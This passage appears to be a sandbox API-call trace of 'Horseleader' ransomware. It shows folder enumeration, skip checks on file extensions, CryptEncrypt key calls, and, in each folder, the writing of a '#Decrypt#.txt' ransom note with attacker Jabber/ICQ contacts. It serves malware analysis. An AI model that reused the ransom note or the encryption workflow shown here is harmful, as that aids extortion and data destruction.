shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.571] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0230.571] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0230.818] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\#Decrypt#.txt") returned 74 [0230.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0230.820] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0230.820] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0230.821] lstrlenA (lpString="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") returned 1368 [0230.821] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0230.821] CloseHandle (hObject=0x158) returned 1 [0230.822] GetProcessHeap () returned 0x780000 [0230.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0230.822] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="es-ES", cAlternateFileName="")) returned 1 [0230.822] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0230.822] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 60 [0230.822] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0230.822] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0230.822] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0230.822] GetProcessHeap () returned 0x780000 [0230.822] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0230.822] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*") returned 62 [0230.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0230.823] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0230.823] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\.") returned 62 [0230.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0230.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0230.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0230.824] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\..") returned 63 [0230.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0230.824] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0230.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0230.824] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0230.824] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned 76 [0230.824] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.824] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.824] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.824] lstrlenW (lpString=".testttjffg") returned 11 [0230.825] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.825] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.825] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.825] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0230.825] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0230.826] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\#Decrypt#.txt") returned 74 [0230.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0230.826] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0230.826] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0230.827] lstrlenA (lpString="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") returned 1368 [0230.828] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0230.828] CloseHandle (hObject=0x158) returned 1 [0230.828] GetProcessHeap () returned 0x780000 [0230.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0230.828] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="et-EE", cAlternateFileName="")) returned 1 [0230.828] lstrcmpiW (lpString1="et-EE", lpString2="Windows") returned -1 [0230.828] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 60 [0230.828] lstrcmpW (lpString1="et-EE", lpString2=".") returned 1 [0230.828] lstrcmpW (lpString1="et-EE", lpString2="..") returned 1 [0230.829] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0230.829] GetProcessHeap () returned 0x780000 [0230.829] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0230.829] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*") returned 62 [0230.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.599] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\.") returned 62 [0231.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.600] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\..") returned 63 [0231.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.600] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0231.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.600] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.600] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned 76 [0231.600] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.600] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.600] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.600] lstrlenW (lpString=".testttjffg") returned 11 [0231.600] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.600] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.600] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.601] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.601] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.601] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\#Decrypt#.txt") returned 74 [0231.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.602] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0231.602] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.604] lstrlenA (lpString="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") returned 1368 [0231.604] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.604] CloseHandle (hObject=0x158) returned 1 [0231.604] GetProcessHeap () returned 0x780000 [0231.604] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.604] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0231.604] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0231.604] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 60 [0231.604] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0231.604] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0231.604] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.605] GetProcessHeap () returned 0x780000 [0231.605] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*") returned 62 [0231.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.605] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\.") returned 62 [0231.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.605] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.605] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\..") returned 63 [0231.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.606] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0231.606] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.606] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.606] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned 76 [0231.606] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.606] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.606] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.606] lstrlenW (lpString=".testttjffg") returned 11 [0231.606] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.709] 
